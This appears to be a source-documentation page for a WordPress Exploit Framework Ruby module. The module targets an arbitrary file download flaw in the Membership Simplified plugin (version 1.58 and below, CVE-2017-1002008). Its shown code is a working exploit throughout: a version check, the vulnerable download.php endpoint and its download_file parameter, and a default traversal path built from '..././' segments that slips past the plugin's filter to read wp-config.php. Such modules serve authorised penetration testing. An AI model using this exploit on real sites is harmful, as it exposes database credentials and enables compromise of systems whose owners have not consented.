class Wpxf::Auxiliary::MembershipSimplifiedArbitraryFileDownload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::FileDownload::new
# File lib/wpxf/modules/auxiliary/file_download/membership_simplified_arbitrary_file_download.rb, line 6
def initialize
  super

  update_info(
    name: 'Membership Simplified <= 1.58 Arbitrary File Download',
    desc: %(
      This module exploits a vulnerability which allows you to download
      any arbitrary file accessible by the user the web server is running
      as. Relative paths must use "..././" as opposed to "../", in order
      to bypass mitigation within the plugin.
    ),
    author: [
      'Larry W. Cashdollar', # Disclosure
      'rastating'            # WPXF module
    ],
    references: [
      ['CVE', '2017-1002008'],
      ['WPVDB', '8777'],
      ['URL', 'http://www.vapidlabs.com/advisory.php?v=187']
    ],
    date: 'Mar 13 2017'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/membership_simplified_arbitrary_file_download.rb, line 30
def check
  changelog = normalize_uri(wordpress_url_plugins, 'membership-simplified-for-oap-members-only', 'readme.txt')
  check_version_from_custom_file(changelog, /\=\s+Beta\s+(\d+\.\d+(\.\d+)*)\s+\=/, '1.59')
end
default_remote_file_path() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/membership_simplified_arbitrary_file_download.rb, line 35
def default_remote_file_path
  '..././..././..././wp-config.php'
end
download_request_params() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/membership_simplified_arbitrary_file_download.rb, line 47
def download_request_params
  { 'download_file' => remote_file }
end
downloader_url() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/membership_simplified_arbitrary_file_download.rb, line 43
def downloader_url
  normalize_uri(wordpress_url_plugins, 'membership-simplified-for-oap-members-only', 'download.php')
end
working_directory() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/membership_simplified_arbitrary_file_download.rb, line 39
def working_directory
  'wp-content/plugins/membership-simplified-for-oap-members-only'
end